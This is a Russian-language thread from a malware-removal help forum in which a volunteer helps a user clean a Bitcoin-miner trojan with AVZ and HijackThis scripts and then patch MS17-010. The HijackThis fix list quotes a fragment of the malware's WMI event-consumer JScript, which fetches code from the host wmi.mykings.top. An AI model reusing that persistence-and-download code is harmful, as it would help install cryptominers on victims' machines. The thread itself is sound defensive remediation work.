этот файл грузит процессор на 70% после удаления этого файла, он появляется снова в папке виндоус/ хэлп и еще в папке дедуг, я через безопасность ограничил к нему доступ, но он появляется заново с еще одной буквой (е) на конце
этот файл грузит процессор на 70% после удаления этого файла, он появляется снова в папке виндоус/ хэлп и еще в папке дедуг, я через безопасность ограничил к нему доступ, но он появляется заново с еще одной буквой (е) на конце
Уважаемый(ая) Олег88-13, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Выполните скрипт в AVZ:Компьютер перезагрузится.Код:begin TerminateProcessByName('c:\windows\help\lsmosee.exe'); StopService('clr_optimization_v1.03'); QuarantineFile('C:\Users\Олег\AppData\Roaming\mystartsearch\UninstallManager.exe', ''); QuarantineFile('C:\Users\Олег\appdata\roaming\system\libs\svchost.exe', ''); QuarantineFile('C:\Users\Олег\AppData\Roaming\System\svchost.exe', ''); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('c:\windows\help\lsmosee.exe', ''); QuarantineFile('C:\Windows\syswow64\lsmos.exe', ''); DeleteFile('C:\Users\Олег\AppData\Roaming\mystartsearch\UninstallManager.exe', '32'); DeleteFile('C:\Users\Олег\appdata\roaming\system\libs\svchost.exe', '32'); DeleteFile('C:\Users\Олег\AppData\Roaming\System\svchost.exe', '32'); DeleteFile('c:\windows\debug\item.dat', '32'); DeleteFile('c:\windows\debug\ok.dat', '32'); DeleteFile('c:\windows\help\lsmosee.exe', '32'); DeleteFile('C:\Windows\syswow64\lsmos.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "{AA139280-187C-4B00-B748-2521D40792E6}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true); DeleteService('clr_optimization_v1.03'); DeleteFileMask('c:\users\олег\appdata\roaming\mystartsearch', '*', true); DeleteDirectory('c:\users\олег\appdata\roaming\mystartsearch'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):Устраняйте уязвимость, которую используют в т. ч. нашумевшие в прошлом году шифровальщики WannaCry и Petya, критическое обновление скачайте для своей системы по ссылке отсюда:Код:O7 - IPSec: Name: win (2017/09/01) - {c4cb5a4d-85ac-4d02-bca7-d54005ab09df} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {c4cb5a4d-85ac-4d02-bca7-d54005ab09df} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {c4cb5a4d-85ac-4d02-bca7-d54005ab09df} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {c4cb5a4d-85ac-4d02-bca7-d54005ab09df} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {c4cb5a4d-85ac-4d02-bca7-d54005ab09df} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O22 - Task: (disabled) Driver Booster SkipUAC (Олег) - C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac (file missing) O22 - Task: (disabled) {54C586A3-3A63-4B28-BED2-E847CA244B78} - C:\Windows\system32\pcalua.exe -a C:\Users\Олег\AppData\Roaming\do-search\UninstallManager.exe -c -ptid=cor O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
http://www.catalog.update.microsoft....px?q=KB4012212
Иначе никогда не избавитесь от заразы.
Сделайте новый лог такой версией Autologger.
WBR,
Vadim
все сделал как вы написали
Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".Отчёт о работе прикрепите.Код:>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Боты Counter-Strike 1.6\Деактивировать ботов.lnk" -> ["C:\Program Files (x86)\Counter-Strike 1.6\cstrike\zBot\Deactivation.bat"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Боты Counter-Strike 1.6\Активировать ботов.lnk" -> ["C:\Program Files (x86)\Counter-Strike 1.6\cstrike\zBot\Activation.bat"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicut\Uninstall.lnk" -> ["C:\Program Files (x86)\Bandicut\uninstall.exe"] >>> "C:\Users\Олег\Desktop\100\MediaGet.lnk" -> ["C:\Users\Олег\AppData\Local\MediaGet2\mediaget.exe"] >>> "C:\Users\Олег\Favorites\Links\Интернет.url" -> hxxp://klakali.ru/?utm_source=favorites03&utm_content=d024e102c3406f9b728065963fbb0e2d&utm_term=719236E284D94B378EC4EC2FB479EDB3&utmd=20180203
Выполните скрипт в AVZ при наличии доступа в интернет:После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.Код:var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end.
WBR,
Vadim
сделал как вы сказали.два лога прикрепил. найдено 4 уязвимости
Обязательно все патчи ставьте, они критические:И UAC рекомендую включить:Поиск критических уязвимостей
MS17-010: Обновления безопасности для Windows SMB Server
http://download.windowsupdate.com/d/...2d8c4e92b3.msu
Накопительное обновление безопасности для браузера Internet Explorer
http://download.windowsupdate.com/d/...7a9adbab5b.msu
Уязвимости в Adobe Flash Player для Internet Explorer
https://fpdownload.adobe.com/get/fla..._player_ax.exeUAC (контроль учётных записей) отключён.
http://windows.microsoft.com/ru-ru/w...control-on-off
WBR,
Vadim
все сделал. из тех папок в которых был вирус.он исчез. думаю что все хорошо теперь
и памяти 17 гб прибавилось))
- - - - -Добавлено - - - - -
спасибо вам огромное!!! я уже думал виндоус переустанавливать
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 2
- В ходе лечения обнаружены вредоносные программы:
- c:\windows\help\lsmosee.exe - Trojan.Win32.BitCoinMiner.agr
Уважаемый(ая) Олег88-13, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.